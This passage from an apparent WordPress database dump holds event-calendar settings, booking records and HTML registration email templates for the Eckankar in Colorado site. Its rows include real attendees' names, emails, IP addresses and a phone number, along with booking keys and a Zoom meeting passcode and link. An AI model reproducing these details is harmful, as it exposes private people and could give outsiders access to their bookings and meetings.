267515,'mec_countdown_method','global'),(172817,267515,'mec_public','1'),(172818,267515,'mec_start_date','2023-01-12'),(172819,267515,'mec_start_time_hour','7'),(172820,267515,'mec_start_time_minutes','0'),(172821,267515,'mec_start_time_ampm','PM'),(172822,267515,'mec_start_day_seconds','68400'),(172823,267515,'mec_end_date','2023-01-12'),(172824,267515,'mec_end_time_hour','8'),(172825,267515,'mec_end_time_minutes','30'),(172826,267515,'mec_end_time_ampm','PM'),(172827,267515,'mec_end_day_seconds','73800'),(172828,267515,'mec_repeat_status','0'),(172829,267515,'mec_repeat_type',''),(172830,267515,'mec_repeat_interval','1'),(172831,267515,'mec_repeat_end',''),(172832,267515,'mec_repeat_end_at_occurrences',''),(172833,267515,'mec_repeat_end_at_date',''),(172834,267515,'mec_advanced_days','a:0:{}'),(172835,267515,'mec_in_days',''),(172836,267515,'mec_not_in_days',''),(172837,267515,'mec_hourly_schedules','a:0:{}'),(172838,267515,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(172839,267515,'mec_tickets','a:0:{}'),(172840,267515,'mec_fees_global_inheritance','1'),(172841,267515,'mec_fees','a:0:{}'),(172842,267515,'mec_ticket_variations_global_inheritance','1'),(172843,267515,'mec_ticket_variations','a:0:{}'),(172844,267515,'mec_reg_fields_global_inheritance','1'),(172845,267515,'mec_reg_fields','a:0:{}'),(172846,267515,'mec_bfixed_fields','a:0:{}'),(172847,267515,'mec_op','a:0:{}'),(172848,267515,'mec_fields','a:0:{}'),(172849,267515,'mec_event_status','EventScheduled'),(172850,267515,'mec_moved_online_link',''),(172851,267515,'mec_cancelled_reason',''),(172852,267515,'mec_display_cancellation_reason_in_single_page',''),(172853,267515,'boldgrid_hide_page_title','0'),(172854,267515,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(172855,267515,'passster_activate_global_protection',NULL),(172856,267515,'passster_activate_protection',NULL),(172857,267515,'passster_protection_type','password'),(172858,267515,'boldgrid_in_page_containers','1'),(172861,267515,'_dp_original','267514'),(172860,267515,'_thumbnail_id','266217'),(172862,267515,'_edit_lock','1673801326:15'),(172863,267515,'_edit_last','15'),(172864,267516,'mec_transaction_id','TJO25322'),(172865,267516,'mec_user_id','1000050'),(172866,267516,'mec_verified','1'),(172867,267516,'mec_verification_key','53b11c13528048d842f4b7d6b7fddc57'),(172868,267516,'mec_cancellation_key','c472f8c14dd7ddd0ccef40b314eb0cd9'),(172869,267516,'mec_confirmed','1'),(172870,267516,'mec_event_id','267433'),(172871,267516,'mec_date','1668948300:1668952800'),(172872,267516,'mec_ticket_id',',1,'),(172873,267516,'mec_booking_time','2022-11-19 11:19:57'),(172874,267516,'mec_all_dates','a:0:{}'),(172875,267516,'mec_other_dates','a:0:{}'),(172876,267516,'mec_attention_time','1668948300:1668952800'),(172877,267516,'mec_attention_time_start','1668948300'),(172878,267516,'mec_attention_time_end','1668952800'),(172879,267516,'mec_book_date_submit','20221119111957'),(172880,267516,'mec_booking_location','129'),(172881,267516,'mec_ticket_price_1','0'),(172882,267516,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:45:\"Sandy(Tarzana San Fernando Valley California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"172.89.183.33\";}}'),(172883,267516,'mec_price','0'),(172884,267516,'mec_gateway','MEC_gateway_free'),(172885,267516,'mec_gateway_label','Free'),(172886,267517,'mec_transaction_id','EFA15402'),(172887,267517,'mec_user_id','1000050'),(172888,267517,'mec_verified','1'),(172889,267517,'mec_verification_key','2369960342a0405f219927d791d9eaa6'),(172890,267517,'mec_cancellation_key','a62f93fb87c42a4f2c55b1474584bd45'),(172891,267517,'mec_confirmed','1'),(172892,267517,'mec_event_id','267433'),(172893,267517,'mec_date','1668948300:1668952800'),(172894,267517,'mec_ticket_id',',1,'),(172895,267517,'mec_booking_time','2022-11-19 22:43:06'),(172896,267517,'mec_all_dates','a:0:{}'),(172897,267517,'mec_other_dates','a:0:{}'),(172898,267517,'mec_attention_time','1668948300:1668952800'),(172899,267517,'mec_attention_time_start','1668948300'),(172900,267517,'mec_attention_time_end','1668952800'),(172901,267517,'mec_book_date_submit','20221119224306'),(172902,267517,'mec_booking_location','129'),(172903,267517,'mec_ticket_price_1','0'),(172904,267517,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"172.89.183.33\";}}'),(172905,267517,'mec_price','0'),(172906,267517,'mec_gateway','MEC_gateway_free'),(172907,267517,'mec_gateway_label','Free'),(172908,267518,'mec_transaction_id','SMY83311'),(172909,267518,'mec_user_id','1000015'),(172910,267518,'mec_verified','1'),(172911,267518,'mec_verification_key','717c72f5cc581466fe39e6f67e236a13'),(172912,267518,'mec_cancellation_key','2750f46a07c9666ae0c76eaeabda8469'),(172913,267518,'mec_confirmed','1'),(172914,267518,'mec_event_id','267433'),(172915,267518,'mec_date','1668948300:1668952800'),(172916,267518,'mec_ticket_id',',1,'),(172917,267518,'mec_booking_time','2022-11-20 11:43:01'),(172918,267518,'mec_all_dates','a:0:{}'),(172919,267518,'mec_other_dates','a:0:{}'),(172920,267518,'mec_attention_time','1668948300:1668952800'),(172921,267518,'mec_attention_time_start','1668948300'),(172922,267518,'mec_attention_time_end','1668952800'),(172923,267518,'mec_book_date_submit','20221120114301'),(172924,267518,'mec_booking_location','129'),(172925,267518,'mec_ticket_price_1','0'),(172926,267518,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"68.117.21.36\";}}'),(172927,267518,'mec_price','0'),(172928,267518,'mec_gateway','MEC_gateway_free'),(172929,267518,'mec_gateway_label','Free'),(174189,267594,'_form_id','20'),(174188,267594,'_field_220','Hi, I hope all is great with you. Thank you for taking my note. I was wondering if I might coordinate my next initiation, the 6th, through you. \n\nI live in the Parker area any date/time that is convenient for you would work for me. \n\nLet me know your thoughts when your able, smiles\n\nTim'),(174187,267594,'_field_219','ESA-Initiator-Melony Mont-Eton'),(174186,267594,'_field_216','Denver'),(174185,267594,'_field_215','(303) 725-6340'),(174183,267594,'_field_213','Figueroa'),(174184,267594,'_field_214','tfigueroa10@gmail.com'),(174182,267594,'_field_212','Timothy'),(173064,267539,'mec_color',''),(173065,267539,'mec_location_id','118'),(173066,267539,'mec_dont_show_map','0'),(173067,267539,'mec_organizer_id','1'),(173068,267539,'mec_read_more',''),(173069,267539,'mec_more_info',''),(173070,267539,'mec_more_info_title',''),(173071,267539,'mec_more_info_target','_self'),(173072,267539,'mec_cost',''),(173073,267539,'mec_currency','a:0:{}'),(173074,267539,'mec_additional_organizer_ids','a:0:{}'),(173075,267539,'mec_additional_location_ids','a:0:{}'),(173076,267539,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-12-18\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-12-18\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(173077,267539,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(173078,267539,'mec_certain_weekdays','a:0:{}'),(173079,267539,'mec_allday','0'),(173080,267539,'one_occurrence','0'),(173081,267539,'mec_hide_time','0'),(173082,267539,'mec_hide_end_time','0'),(173083,267539,'mec_comment',''),(173084,267539,'mec_timezone','global'),(173085,267539,'mec_countdown_method','global'),(173086,267539,'mec_public','1'),(173087,267539,'mec_start_date','2022-12-18'),(173088,267539,'mec_start_time_hour','10'),(173089,267539,'mec_start_time_minutes','30'),(173090,267539,'mec_start_time_ampm','AM'),(173091,267539,'mec_start_day_seconds','37800'),(173092,267539,'mec_end_date','2022-12-18'),(173093,267539,'mec_end_time_hour','11'),(173094,267539,'mec_end_time_minutes','30'),(173095,267539,'mec_end_time_ampm','AM'),(173096,267539,'mec_end_day_seconds','41400'),(173097,267539,'mec_repeat_status','0'),(173098,267539,'mec_repeat_type',''),(173099,267539,'mec_repeat_interval','1'),(173100,267539,'mec_repeat_end',''),(173101,267539,'mec_repeat_end_at_occurrences',''),(173102,267539,'mec_repeat_end_at_date',''),(173103,267539,'mec_advanced_days','a:0:{}'),(173104,267539,'mec_in_days',''),(173105,267539,'mec_not_in_days',''),(173106,267539,'mec_hourly_schedules','a:0:{}'),(173107,267539,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(173108,267539,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:24:\"Book Discussion - Online\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(173109,267539,'mec_fees_global_inheritance','1'),(173110,267539,'mec_fees','a:0:{}'),(173111,267539,'mec_ticket_variations_global_inheritance','1'),(173112,267539,'mec_ticket_variations','a:0:{}'),(173113,267539,'mec_reg_fields_global_inheritance','1'),(173114,267539,'mec_reg_fields','a:0:{}'),(173115,267539,'mec_bfixed_fields','a:0:{}'),(173116,267539,'mec_op','a:0:{}'),(173117,267539,'mec_fields','a:0:{}'),(173118,267539,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6028:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>813 8144 5634<br />\r\n<b>Passcode:</b> 889898</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us06web.zoom.us/j/81381445634?pwd=bGJ2UXBCQllmTnU4SHlGRHNFWTZZZz09\">https://us06web.zoom.us/j/81381445634?pwd=bGJ2UXBCQllmTnU4SHlGRHNFWTZZZz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:31:\"Admin  - New Event Registration\";s:7:\"content\";s:10004:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" 